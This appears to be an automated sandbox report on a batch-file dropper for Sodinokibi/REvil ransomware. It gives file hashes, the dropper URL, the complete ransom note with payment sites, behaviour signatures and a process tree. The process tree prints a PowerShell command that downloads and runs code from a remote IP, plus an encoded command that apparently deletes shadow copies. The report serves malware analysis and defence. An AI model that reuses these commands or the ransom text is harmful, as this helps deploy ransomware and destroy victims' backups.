Analysis

  • max time kernel
    64s
  • max time network
    67s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    15-08-2020 22:10

General

  • Target

    671ad8514649a9e90db4be04050939fc.bat

  • Size

    222B

  • MD5

    ae3b86ee141489a333cd5b79879ce5fb

  • SHA1

    59fcd2d5b1dc48ea3a135a908d2342f41801c748

  • SHA256

    9f5a1dc3b6de60187465045347cd822a1442279e6d75aa5b8e08bfe8811619c4

  • SHA512

    08e7101feb1b8fcc3e48a3b6586279038d039490a198bbfa3c71acfb6c020b917a5941517376d1f7518f8e28b810f871c0401ad2aa0dc5ff86c522a18973d6c7

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/671ad8514649a9e90db4be04050939fc

Extracted

Path

C:\606xjwojaa-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 606xjwojaa. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6AD7DD90AE53F818 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/6AD7DD90AE53F818 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: h4SqNk49uVRBWAsn94RVBGk48n/7fvny0amd6DjLgFpJISFY8F89pYemuuFX+JnK cYCzdpAZZLTRX+WZLM8meAiyBKS/WSeFyx9+wTlgZMIyDdmODy+ot0m8G2IMB7YH C4G7hBzbkSanBBZVw+qUkUwOtcwGpztMcjg9TGYAauz/4ButaPk8O7+DNvqSGoiN nKrPhI3BFmX3BI2v+EBrEKhClgFoMd+fwMQdv582FtFITBVTRjQNY163YXDhHcpv 0ZO5wSxlqwKXZ6sZt/AVrRr/XL+xO91Mlyvy42NruRtraLr8yaDbh+gUYT2JL/4x wETrMN/AN06ZBgujyDGkwichip8yWCMHsI6OHl36D6SScK9AoX5jmvmsQU9G4i8H GzXeaad2/yrVZY57D43LejxfCIN0YDqHiyRlYzXqIUW3x0f15/6IP65wElgLS3gP 5QVq0kqQ9JlHqKYvvfXJlU5BnFDR5NxrtXy7LlDJfjeIsTdXGCsILIylZBUVE3+j 1UR3iX/rVT/95XcgTxsIyo9VE5teJvFvNpN0Om6QBfpRmU2KmqQVS68W6wxR0Qe+ NnZKafXoV2x9jbtVKarzb3OVltILNyBaQdwTL71xTe8JoU1IgWB+P4BdeHgRD4i6 LVtFY/UWvDDmQNpZgvPcUOeZnuUFCqX2AIxaspd88IFNwAeSVeCrZHOm5FOYgnDi s21a1aD2vKHE8yWB8CJvxzjE9rILzU2hMRCuFOl+jTsjHT3T63s3PvS0JyAn9L2B nezR5amxjDGy6rDmi2MVNFg+mOWTF9k6W3K4f49m481z3Oo5n8dFj0uQDPqlqcZt FKjc8ZhaOHZxdRnciQsJAmzDG7iUxghxdCRDCpJsrePs/6duo2zbxI06Yxz3tfIA mjTGDr7G5NgmW95wqqroDx9lhOu8JtUpUXcYq1r4uyjqGo5+Eu79tnC9bJhlOOTE 7Cvyr51zZpvaK2fuFdQz5l0dL24+t2ICqTPbM0lGso5i1bUtmmPEBJF2bokck1gY Ni53uQcITOYWtDrMYxpRhRHhhEZFX1XWKTwfqKJP50fRtnsQC1KmvP8N/hKrsEr1 W9bCSB+YTFvCtuWCLpeaEKHgGRG6hvk5eP1WM7mDRNrTZP37fw8f41jRvjAvR5+L XvHenhpFAbtt0FSgjvnjMPe/YgtCefU4jSlgq13k1QPgymfG8Qp5acHIxbRDsBCk m+ALOuhV4JjAwdaoXg/aSLKoTrAu+3enZogMXyDDNZW9wUQ5wAjh0vG80S0P8Lf6 N432LDlsdVDp127nOCNcPnrVlwemjpdA ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6AD7DD90AE53F818

http://decryptor.cc/6AD7DD90AE53F818

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 1 IoCs
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 25 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\671ad8514649a9e90db4be04050939fc.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3888
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/671ad8514649a9e90db4be04050939fc');Invoke-BLPXTQOPGQRVCUQ;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3792
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3164
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:3568

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3164-13-0x0000000000000000-mapping.dmp

  • memory/3164-27-0x0000000009820000-0x0000000009821000-memory.dmp

    Filesize

    4KB

  • memory/3164-26-0x00000000091B0000-0x00000000091B1000-memory.dmp

    Filesize

    4KB

  • memory/3164-24-0x0000000009250000-0x0000000009251000-memory.dmp

    Filesize

    4KB

  • memory/3164-14-0x00000000734A0000-0x0000000073B8E000-memory.dmp

    Filesize

    6.9MB

  • memory/3792-8-0x0000000006F80000-0x0000000006F81000-memory.dmp

    Filesize

    4KB

  • memory/3792-6-0x0000000006FB0000-0x0000000006FB1000-memory.dmp

    Filesize

    4KB

  • memory/3792-7-0x00000000077A0000-0x00000000077A1000-memory.dmp

    Filesize

    4KB

  • memory/3792-0-0x0000000000000000-mapping.dmp

  • memory/3792-9-0x0000000007E90000-0x0000000007E91000-memory.dmp

    Filesize

    4KB

  • memory/3792-10-0x0000000007EE0000-0x0000000007EE1000-memory.dmp

    Filesize

    4KB

  • memory/3792-11-0x00000000095A0000-0x00000000095A1000-memory.dmp

    Filesize

    4KB

  • memory/3792-12-0x0000000008B10000-0x0000000008B11000-memory.dmp

    Filesize

    4KB

  • memory/3792-5-0x0000000006DF0000-0x0000000006DF1000-memory.dmp

    Filesize

    4KB

  • memory/3792-4-0x0000000006C90000-0x0000000006C91000-memory.dmp

    Filesize

    4KB

  • memory/3792-3-0x0000000007070000-0x0000000007071000-memory.dmp

    Filesize

    4KB

  • memory/3792-2-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

    Filesize

    4KB

  • memory/3792-1-0x00000000734A0000-0x0000000073B8E000-memory.dmp

    Filesize

    6.9MB